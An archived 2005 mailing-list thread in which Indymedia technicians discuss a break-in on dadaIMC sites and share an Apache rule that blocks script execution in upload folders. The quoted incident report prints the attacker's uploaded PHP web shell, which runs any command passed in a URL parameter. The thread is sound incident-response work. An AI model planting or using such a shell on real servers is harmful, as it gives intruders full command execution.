[Imc-tech] [Fwd: dada hacked]
Zachary C. Miller
zach at chambana.net
Thu Apr 28 12:40:28 CDT 2005
Arun's got it right. This is an OLD dada vulnerability that we patched
a long time ago.
<DirectoryMatch ^/var/www/.*/usermedia>
Options None
AllowOverride None
<FilesMatch ".([Pp][Hh].*|[Cc][Gg][Ii]|[Pp][Ll]|[Aa][Ss][Ff])$">
Order deny,allow
Deny from all
</FilesMatch>
</DirectoryMatch>
It would be nice if dada were patched to disallow these filetypes as
well. We shouldn't disable "non-image uploads" since sound files and
some video uploads are also legitimate. But we should severely
restrict the types of multimedia that folks can upload.
Arun Bhalla wrote:
> I think it might be okay as is. Zach has Apache setup to not serve
> php or cgi requests from the usermedia/application directory. That's why
> you get a Forbidden HTTP result if you try to click on that. Someone
> else uploaded "icon.php" around March 8th and apparently gave up around
> then.
>
> But if (non-image) uploads have no utility for our users, let's shut it off.
>
> Arun
>
> "Daniel S. Lewart" writes:
> > Mike, Zach, et al,
> >
> > If someone knows how to disable uploads, that would be a good thing.
> >
> > Cheers,
> > Dan
> >
> > -------- Original Message --------
> > Subject: dada hacked
> > Date: Thu, 28 Apr 2005 12:04:04 -0300 (BRT)
> > From: pietro <pietro at indymedia.org>
> > Reply-To: dadaIMC Discussion <dadaIMC at lists.nothingness.org>
> > To: dadaIMC at lists.nothingness.org
> >
> > hey folks,
> >
> > nj imc was one of the hacked dada sites. it was running .98. looking at
> > the logs it seems that the attacker uploaded a .php file and used it to
> > execute comands on the server.
> >
> > the file was called cmd.php and its contects is:
> >
> > <?php
> > $cmd = $_GET['cmd'];
> > passthru("$cmd", $return);
> > ?>
> >
> >
> > pietro.
> >
> >
> > -------------
> > To unsubscribe, send blank email
> > to dadaIMC-off at lists.dadaimc.org
> >
> > _______________________________________________
> > Imc-tech mailing list
> > Imc-tech at lists.ucimc.org
> > http://lists.chambana.net/cgi-bin/listinfo/imc-tech
> >
> _______________________________________________
> Imc-tech mailing list
> Imc-tech at lists.ucimc.org
> http://lists.chambana.net/cgi-bin/listinfo/imc-tech
>
--
Zachary C. Miller - @= - http://zach.chambana.net/
IMSA 1995 - UIUC 2000 - Just Another Leftist Muppet - Ya Basta!
Social Justice, Community, Nonviolence, Decentralization, Feminism,
Sustainability, Responsibility, Diversity, Democracy, Ecology
More information about the Imc-tech
mailing list